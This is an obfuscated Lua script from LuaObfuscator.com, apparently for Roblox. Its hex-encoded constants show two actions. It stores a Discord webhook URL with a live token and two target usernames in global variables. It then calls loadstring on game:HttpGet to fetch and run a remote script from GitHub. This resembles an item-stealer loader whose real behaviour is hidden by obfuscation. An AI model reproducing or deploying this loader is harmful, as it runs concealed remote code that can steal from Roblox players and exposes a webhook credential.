--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v97=v5(v83,v19);v19=nil;return v97;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -((1484 -(226 + 1044)) + 713)))) ;return v85-(v85%(1 + 0)) ;end end else local v86=0 + 0 ;local v87;while true do if ((877 -(282 + 595))==v86) then v87=(1639 -(1523 + (496 -382)))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (1 -0)) or (1065 -((185 -(32 + 85)) + 997)) ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 + (0 -0))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 4 ;return (v41 * (12302277 + 4474939)) + (v40 * ((639498 -478597) -95365)) + (v39 * (189 + 67)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=(3665 -2712) -(802 + 150) ;local v45=(v20(v43,443 -(416 + 26) ,53 -(105 -72) ) * ((3 -1)^(11 + 13 + 8))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -56 );local v47=((v20(v43,32)==(1 + 0)) and  -(1 -0)) or (1188 -((1890 -821) + 118)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(2031 + 16)) then return ((v45==((1229 -(145 + 293)) -(368 + 423))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(70 -(10 + 8))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(430 -(44 + 386))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=1487 -(998 + 488) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=0) then else v52=0;v53=nil;v51=1;end if (v51==2) then v56=nil;v57=nil;v51=701 -(208 + 490) ;end if (v51~=(1 + 2)) then else v58=nil;while true do local v92=0 + 0 ;while true do if (v92==1) then if (v52==(837 -(660 + 176))) then local v98=0;while true do if (v98==(0 + 0)) then v57=v23();v58={};v98=1;end if (v98~=2) then else v52=2;break;end if (v98~=(203 -(14 + 188))) then else local v114=675 -(534 + 141) ;while true do if (0==v114) then for v155=1 + 0 ,v57 do local v156=0 + 0 ;local v157;local v158;local v159;local v160;while true do if (v156==(0 + 0)) then v157=0 -0 ;v158=nil;v156=1;end if (v156~=(1 -0)) then else v159=nil;v160=nil;v156=5 -3 ;end if (v156==(2 + 0)) then while true do if ((0 + 0)==v157) then v158=396 -(115 + 281) ;v159=nil;v157=1;end if (v157~=(2 -1)) then else v160=nil;while true do if (v158==(0 + 0)) then v159=v21();v160=nil;v158=1;end if (v158==1) then if (v159==1) then v160=v21()~=0 ;elseif (v159==2) then v160=v24();elseif (v159~=3) then else v160=v25();end v58[v155]=v160;break;end end break;end end break;end end end v56[7 -4 ]=v21();v114=1;end if (v114~=(3 -2)) then else v98=869 -(550 + 317) ;break;end end end end end break;end if (v92==(0 -0)) then if (v52==(2 -0)) then local v99=0 -0 ;local v100;while true do if (v99~=0) then else v100=285 -(134 + 151) ;while true do if (v100==0) then for v161=1,v23() do local v162=1665 -(970 + 695) ;local v163;local v164;while true do if (v162~=1) then else while true do if (v163~=(0 -0)) then else v164=v21();if (v20(v164,1,1)==0) then local v172=0;local v173;local v174;local v175;local v176;local v177;while true do if ((1990 -(582 + 1408))==v172) then v173=0 -0 ;v174=nil;v172=1;end if (v172==(1 -0)) then v175=nil;v176=nil;v172=2;end if (v172==2) then v177=nil;while true do if (v173==(0 -0)) then v174=1824 -(1195 + 629) ;v175=nil;v173=1;end if (1==v173) then v176=nil;v177=nil;v173=2;end if (v173==(2 -0)) then while true do if (v174==0) then local v179=241 -(187 + 54) ;local v180;while true do if ((780 -(162 + 618))~=v179) then else v180=0;while true do if (v180==1) then v174=1;break;end if (v180==0) then local v188=0 + 0 ;while true do if (v188==(1 + 0)) then v180=1;break;end if (v188~=0) then else v175=v20(v164,2,6 -3 );v176=v20(v164,4,9 -3 );v188=1;end end end end break;end end end if (v174==3) then if (v20(v176,3,1 + 2 )~=(1637 -(1373 + 263))) then else v177[1004 -(451 + 549) ]=v58[v177[4]];end v53[v161]=v177;break;end if (v174~=(1 + 1)) then else local v182=0;local v183;while true do if (v182==(0 -0)) then v183=0;while true do if (v183~=(1 -0)) then else v174=1387 -(746 + 638) ;break;end if (v183==(0 + 0)) then local v189=0 -0 ;while true do if (v189~=1) then else v183=1;break;end if (v189==(341 -(218 + 123))) then if (v20(v176,1,1582 -(1535 + 46) )==(1 + 0)) then v177[1 + 1 ]=v58[v177[562 -(306 + 254) ]];end if (v20(v176,2,1 + 1 )==(1 -0)) then v177[3]=v58[v177[3]];end v189=1468 -(899 + 568) ;end end end end break;end end end if (v174~=1) then else local v184=0 + 0 ;while true do if (v184==0) then v177={v22(),v22(),nil,nil};if (v175==(290 -(60 + 230))) then local v187=572 -(426 + 146) ;while true do if (v187==0) then v177[1 + 2 ]=v22();v177[1460 -(282 + 1174) ]=v22();break;end end elseif (v175==(812 -(569 + 242))) then v177[3]=v23();elseif (v175==(5 -3)) then v177[1 + 2 ]=v23() -((1026 -(706 + 318))^(1267 -(721 + 530))) ;elseif (v175~=3) then else local v198=0;while true do if (v198==(1271 -(945 + 326))) then v177[3]=v23() -(2^(39 -23)) ;v177[4]=v22();break;end end end v184=1;end if (v184~=(1 + 0)) then else v174=2;break;end end end end break;end end break;end end end break;end end break;end if (v162==(700 -(271 + 429))) then v163=0 + 0 ;v164=nil;v162=1501 -(1408 + 92) ;end end end for v165=1087 -(461 + 625) ,v23() do v54[v165-(1289 -(993 + 295)) ]=v28();end v100=1;end if (1==v100) then return v56;end end break;end end end if (v52~=0) then else local v101=0 + 0 ;local v102;while true do if (v101==0) then v102=1171 -(418 + 753) ;while true do if (v102==1) then v55={};v56={v53,v54,nil,v55};v102=1 + 1 ;end if (0==v102) then local v151=0;while true do if (v151==(1 + 0)) then v102=1;break;end if (0==v151) then v53={};v54={};v151=530 -(406 + 123) ;end end end if ((1771 -(1749 + 20))==v102) then v52=1;break;end end break;end end end v92=1 + 0 ;end end end break;end if (v51==1) then local v91=0;while true do if (v91==1) then v51=1324 -(1249 + 73) ;break;end if (v91==(0 + 0)) then v54=nil;v55=nil;v91=1;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v88=0,v75 do if (v88>=v69) then v73[v88-v69 ]=v74[v88 + 1 ];else v77[v88]=v74[v88 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then v77[v79[2]]();elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=2) then v77[v79[2]]=v79[3]~=0 ;elseif (v80>3) then do return;end else v77[v79[2]]=v79[3];end elseif (v80<=7) then if (v80<=5) then v71=v79[3];elseif (v80>6) then local v118=v79[2];local v119,v120=v70(v77[v118](v13(v77,v118 + 1 ,v79[3])));v72=(v120 + v118) -1 ;local v121=0;for v143=v118,v72 do local v144=0;while true do if (v144==0) then v121=v121 + 1 ;v77[v143]=v119[v121];break;end end end else v71=v79[3];end elseif (v80<=8) then local v105=v79[2];v77[v105]=v77[v105](v13(v77,v105 + 1 ,v72));elseif (v80==9) then v77[v79[2]]=v79[3];else local v125=0;local v126;while true do if (v125==0) then v126=v79[2];v77[v126]=v77[v126](v13(v77,v126 + 1 ,v72));break;end end end elseif (v80<=15) then if (v80<=12) then if (v80==11) then local v107=0;local v108;local v109;while true do if (v107==0) then v108=v79[2];v109=v77[v79[3]];v107=1;end if (v107==1) then v77[v108 + 1 ]=v109;v77[v108]=v109[v79[4]];break;end end else v77[v79[2]]();end elseif (v80<=13) then v77[v79[2]][v79[3]]=v79[4];elseif (v80==14) then do return;end else local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==2) then for v169=v128,v72 do v131=v131 + 1 ;v77[v169]=v129[v131];end break;end if (1==v127) then v72=(v130 + v128) -1 ;v131=0;v127=2;end if (0==v127) then v128=v79[2];v129,v130=v70(v77[v128](v13(v77,v128 + 1 ,v79[3])));v127=1;end end end elseif (v80<=18) then if (v80<=16) then v77[v79[2]]=v61[v79[3]];elseif (v80==17) then local v132=v79[2];local v133=v77[v79[3]];v77[v132 + 1 ]=v133;v77[v132]=v133[v79[4]];else v77[v79[2]]=v61[v79[3]];end elseif (v80<=19) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==20) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313230323632352O393439382O35313334382F37365349557A4C636D4C443053744969572O3933377057542D794249746570687369587A622O47756A476A696A31424F6F57524136584E357267554E76426F7A78416768030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O0079756B6936375003093O00557365724E616D653203083O004D57414A4559444100173O0012093O00013O0026133O000E000100020004053O000E0001001210000100033O003015000100040005001210000100063O001210000200073O002011000200020008001209000400094O0002000500014O000F000200054O000A00013O00022O000C0001000100010004053O001600010026133O0001000100010004053O00010001001210000100033O0030150001000A000B001210000100033O0030150001000C000D0012093O00023O0004053O000100012O00043O00017O00",v9(),...);end
